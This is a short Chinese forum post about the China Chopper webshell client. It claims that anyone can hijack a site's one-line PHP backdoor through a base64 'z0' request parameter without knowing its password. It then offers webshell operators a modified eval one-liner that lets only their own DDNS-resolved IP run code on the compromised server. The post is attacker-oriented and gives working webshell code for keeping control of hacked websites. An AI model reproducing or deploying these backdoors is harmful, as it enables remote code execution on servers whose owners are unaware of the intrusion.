中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞就算你设置了密码,使用了eval($_REQUEST['moyo']);
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST));
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
不知道是设计缺陷还是故意留的后门
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
然后一句话后门这样写
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
这样就可以让一句话后门只允许自己的电脑连接了
页:
[1]